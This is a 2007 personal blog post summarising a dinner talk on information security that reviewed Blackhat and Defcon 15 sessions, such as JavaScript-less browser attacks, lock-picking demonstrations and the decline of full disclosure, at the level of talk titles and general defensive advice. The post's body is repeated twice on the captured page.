Pseudo-liveblogging: GeekSouth
I attended my first GeekSouth
dinner
Tonight I'm attending a dinner with a group
called GeekSouth. Tonight there will be a speaker on
information security. Since there's no wireless here in the restaurant, this
will only be psuedo-liveblogging. I'll be typing everything live, but I'll have
to wait until I get home to post it
all.
Our speaker for tonight will be Erik W. Rolf, President of Deliberare, Inc. I see he's on a powerbook as well and using keynote '08 - I already like him.
Juan does the introduction and we're off.
Tonight we're going to cover the time he spent in Vegas at Defcon and Blackhat. These are two big hacker conferences. We'll also cover some "news you can use".
Blackhat:
- Grossman and Hansen: "Fun with and without Javascript Malware"
The interesting thing is that everyone says you can turn your javascript off and be safe, but thats actualy not true anymore. "New research has revealed that even if Javascript has been disabled or restricted, some now popular attack techniques - such as Browser Intranet Hacking, Port Scanning and History Stealing can still be perpetrated."
A lot of corporations spend a lot of money on firewalling, NATd IPs and such, but that filters the stuff coming IN to the network. These hacks are specifically dangerous for what they send OUT of the network, and they come in through normal web traffic so they can't be blocked.
How do we stop that? One way is through egress filtering in the corporate environment. This would specifically target the traffic coming out of the web, and possibly block malicious stuff. Another option is personal firewalling software, which should be able to block some of these attacks.
Other interesting talks:
- Brad Hill "attacking XML security" - highlighting some of the dangers in the AJAX security model.
- Sullivan & Hoffman "Premature AJAX-ulation"
- "NACATTACK" - hacks that attack Cisco software that is supposed to secure visiting laptop users on corporate networks.
He showed us a video on how they can pick physical locks with all sorts of crazy stuff - a Kryptonite lock with a ball point pen, a Master lock with an electric toothbrush, and a Kensington lock (those little cables that everyone has a hole for on his laptop) with a roll of toilet paper!
Defcon 15:
"Dirty Secrets of the Security Industry"
- Defense in Depth is Dead (at least as we know it): These are really means of only protecting poorly written software.
- You can't train everyone: Even if you do, they won't always do what they're told to do.
- Network Security is Dead: See the javascript talk above
- Full disclosure is dead: Full disclosure is when you find a hack in a certain browser or software, then you publish it everywhere to force the company into fixing it. The problem is that most hacking stuff is actually being heavily run by organized crime. If they find an exploit, most likely they will simply use it rather than disclose it because they don't want it patched.
So what to do? Fix the $#%&ing code
- Type Safety
- Secure coding taught to ALL CS majors
- Trusted computing
- At least, we need better software controls on our systems, not better firewalls.
New you can use:
- Privacy is pretty much dead. There's a lot of data out there about us, and people seem to keep finding it (e.g. TJ Maxx's recent compromise)
- Vulnerabilities are way up. SANS email just from this week said it is the largest batch of critical exploits it has ever seen in one week.
So what do we do?
- Talk to Erik - Deliberare :)
- Use a Mac (amen!)
Our speaker for tonight will be Erik W. Rolf, President of Deliberare, Inc. I see he's on a powerbook as well and using keynote '08 - I already like him.
Juan does the introduction and we're off.
Tonight we're going to cover the time he spent in Vegas at Defcon and Blackhat. These are two big hacker conferences. We'll also cover some "news you can use".
Blackhat:
- Grossman and Hansen: "Fun with and without Javascript Malware"
The interesting thing is that everyone says you can turn your javascript off and be safe, but thats actualy not true anymore. "New research has revealed that even if Javascript has been disabled or restricted, some now popular attack techniques - such as Browser Intranet Hacking, Port Scanning and History Stealing can still be perpetrated."
A lot of corporations spend a lot of money on firewalling, NATd IPs and such, but that filters the stuff coming IN to the network. These hacks are specifically dangerous for what they send OUT of the network, and they come in through normal web traffic so they can't be blocked.
How do we stop that? One way is through egress filtering in the corporate environment. This would specifically target the traffic coming out of the web, and possibly block malicious stuff. Another option is personal firewalling software, which should be able to block some of these attacks.
Other interesting talks:
- Brad Hill "attacking XML security" - highlighting some of the dangers in the AJAX security model.
- Sullivan & Hoffman "Premature AJAX-ulation"
- "NACATTACK" - hacks that attack Cisco software that is supposed to secure visiting laptop users on corporate networks.
He showed us a video on how they can pick physical locks with all sorts of crazy stuff - a Kryptonite lock with a ball point pen, a Master lock with an electric toothbrush, and a Kensington lock (those little cables that everyone has a hole for on his laptop) with a roll of toilet paper!
Defcon 15:
"Dirty Secrets of the Security Industry"
- Defense in Depth is Dead (at least as we know it): These are really means of only protecting poorly written software.
- You can't train everyone: Even if you do, they won't always do what they're told to do.
- Network Security is Dead: See the javascript talk above
- Full disclosure is dead: Full disclosure is when you find a hack in a certain browser or software, then you publish it everywhere to force the company into fixing it. The problem is that most hacking stuff is actually being heavily run by organized crime. If they find an exploit, most likely they will simply use it rather than disclose it because they don't want it patched.
So what to do? Fix the $#%&ing code
- Type Safety
- Secure coding taught to ALL CS majors
- Trusted computing
- At least, we need better software controls on our systems, not better firewalls.
New you can use:
- Privacy is pretty much dead. There's a lot of data out there about us, and people seem to keep finding it (e.g. TJ Maxx's recent compromise)
- Vulnerabilities are way up. SANS email just from this week said it is the largest batch of critical exploits it has ever seen in one week.
So what do we do?
- Talk to Erik - Deliberare :)
- Use a Mac (amen!)
Posted: Tue - August 21, 2007 at 06:56 PM | | | | | | |
Quick Links
Calendar
| Sun | Mon | Tue | Wed | Thu | Fri | Sat |
Categories
Archives
XML/RSS Feed
Highlighted posts
Blogs of interest
The Moviegoer
Anesthetic Smoke
Scots Wha Hae!
Applied Semiotics
Odelay!
The Adagio County Independent
A Firm Nail
Eidos : Dr. John Mark Reynolds
Mere Orthodoxy
A Voice in the Wilderness
Jollyblogger
Squiblog
Beyond the Rim
ESV Bible blog
My Tobacco Cellar
Anesthetic Smoke
Scots Wha Hae!
Applied Semiotics
Odelay!
The Adagio County Independent
A Firm Nail
Eidos : Dr. John Mark Reynolds
Mere Orthodoxy
A Voice in the Wilderness
Jollyblogger
Squiblog
Beyond the Rim
ESV Bible blog
My Tobacco Cellar
Brought to you by
The Church Directory
Counters provided by
Statistics
Total entries in this blog:
Total entries in this category:
Published On: Aug 21, 2007 09:22 PM
Total entries in this category:
Published On: Aug 21, 2007 09:22 PM
Search
The Tip Jar
Counter provided by
Brought to you by
